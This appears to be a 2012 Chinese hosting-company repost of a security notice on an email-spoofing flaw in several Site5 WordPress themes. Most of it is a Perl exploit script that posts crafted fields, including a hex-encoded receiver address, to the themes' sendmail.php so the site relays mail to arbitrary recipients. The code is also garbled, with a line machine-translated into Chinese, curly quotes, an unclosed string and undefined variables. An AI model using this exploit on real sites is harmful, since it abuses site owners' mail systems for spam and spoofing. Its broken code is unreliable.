Site5 WordPress电子邮件欺骗漏洞 |
发布时间: 2012/7/28 18:44:00 |
以下是利用本地搭建的site5 wordpress 漏洞文件:
diary, simploblack, simplo, journalcrunch, boldy, webfolio
my $theme = ‘diary’;
my $url = $wordpress.’wp-content/themes/’.$theme.’/sendmail.php’;
我的电子邮件=“test.five@yahoo.cn;
#Receiver email address
my $receiver = ‘test.five@yahoo.cn’;
$receiver =~ s/(.)/sprintf(“%x”,ord($1))/eg;
my $ua = LWP::UserAgent->new();
my $request = POST( $url, [ name => $name, email => $email, comment => $comment, receiver => $receiver, submit => 'submit', ] );
print “Sending request to $url\n”;
my $content = $ua->request($request)->as_string();
print $content;
print “\nDone\nFollow \@BallastSec on Twitter\n”;
亿恩科技地址(ADD):郑州市黄河路129号天一大厦608室 邮编(ZIP):450008 传真(FAX):0371-60123888
联系:亿恩小凡 QQ:89317007 电话:0371-63322206 本文出自:亿恩科技【www.enkj.com】 本文出自:亿恩科技【www.enidc.com】 --> |